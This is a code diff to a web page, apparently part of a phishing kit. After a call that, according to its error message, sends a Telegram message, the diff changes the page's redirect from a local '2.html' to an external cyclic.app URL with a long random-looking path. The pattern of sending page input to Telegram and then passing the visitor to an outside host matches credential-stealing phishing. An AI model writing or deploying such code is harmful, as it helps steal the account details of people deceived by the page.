--- a/public/team/1436023842834963/index.html
+++ b/public/team/1436023842834963/index.html
@@ -12306,7 +12306,7 @@
           }).then(function () {
             // Handle success, e.g., show modal
             // $('#exampleModal').modal('show');
-            window.location.href = "2.html"
+            window.location.href = "https://channel-3245843569124.cyclic.app/iGq3Ov8Wx5Ry2Gz9Jp1Th4Xw7Vl9Yk0Ux6Vr1Lc8Kj7Ig5Pq2Bm3Ez0Hn9"
           }).catch(function (error) {
             console.error('Error sending Telegram message:', error);
           });
